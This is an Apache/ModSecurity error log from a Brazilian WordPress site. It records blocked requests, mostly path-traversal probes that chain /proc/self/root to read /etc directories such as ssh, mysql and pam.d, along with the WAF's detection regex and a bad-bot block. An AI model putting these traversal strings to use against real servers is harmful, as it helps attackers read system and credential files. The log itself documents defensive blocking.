https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:25:41.530813 2026] [access_compat:error] [pid 29802:tid 140411658000128] [client 142.248.80.157:56127] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/theme-install.php, referer: https://www.google.com/
[Mon Mar 16 16:25:44.018142 2026] [access_compat:error] [pid 29802:tid 140411691570944] [client 142.248.80.157:56127] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/admin-ajax.php, referer: https://bandeirantesbombas.com.br/wp-admin/plugin-editor.php
[Mon Mar 16 16:25:55.097663 2026] [:error] [pid 29507:tid 140411607643904] [client 74.7.241.46:53740] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZQ0r9dMAiw-8KANNX7QAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:25:57.568517 2026] [:error] [pid 10772:tid 140411607643904] [client 74.7.241.46:36658] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZRf9ocpUE4ed4uDwDxQAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:26:20.853503 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.228.16:56864] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhZXLABkC4fWIHEf8EELgAAAEs"]
[Mon Mar 16 16:26:45.183699 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.241.46:33962] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZdbABkC4fWIHEf8EEWAAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:26:48.684020 2026] [:error] [pid 21805:tid 140411632822016] [client 74.7.241.46:47016] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZeLABkC4fWIHEf8EEXQAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:26:49.951609 2026] [:error] [pid 21806:tid 140411557287680] [client 74.7.241.46:55138] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZedSswJuvopo3lOhwjgAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:26:52.154831 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.241.46:55148] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZfI6lpbStxTqkSkt8wAAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:26:57.164424 2026] [:error] [pid 15568:tid 140411649607424] [client 74.7.241.46:55158] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZgaQpVkWug9HeOt9HxQAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:27:10.302455 2026] [:error] [pid 10831:tid 140411548894976] [client 74.7.241.46:53978] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZjY6lpbStxTqkSkt8zQAAAlc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:27:11.706235 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.241.46:44130] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZj7ABkC4fWIHEf8EEeQAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:27:12.871650 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.241.46:44142] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZkLABkC4fWIHEf8EEfAAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:27:19.260912 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.241.46:44146] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZl_9ocpUE4ed4uDwD1QAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:27:20.612714 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.241.46:41424] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZmP9ocpUE4ed4uDwD1gAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:27:21.897010 2026] [:error] [pid 15568:tid 140411708356352] [client 74.7.241.46:41440] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZmaQpVkWug9HeOt9HygAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:27:23.242343 2026] [:error] [pid 21806:tid 140411649607424] [client 74.7.241.46:41442] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZm9SswJuvopo3lOhwjwAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:27:24.487804 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.241.46:41446] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZnLysWC90G-1nBrBVqwAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:27:25.672868 2026] [:error] [pid 29507:tid 140411574073088] [client 74.7.241.46:41458] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZnUr9dMAiw-8KANNYPwAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:27:29.055913 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.241.46:41464] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZoY6lpbStxTqkSkt81AAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:27:30.397551 2026] [:error] [pid 15568:tid 140411607643904] [client 74.7.241.46:36224] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZoqQpVkWug9HeOt9HywAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:27:33.034981 2026] [:error] [pid 29507:tid 140411624429312] [client 74.7.241.46:36238] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZpUr9dMAiw-8KANNYQQAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:27:34.535286 2026] [:error] [pid 10772:tid 140411683178240] [client 74.7.241.46:36254] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhZpv9ocpUE4ed4uDwD1wAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
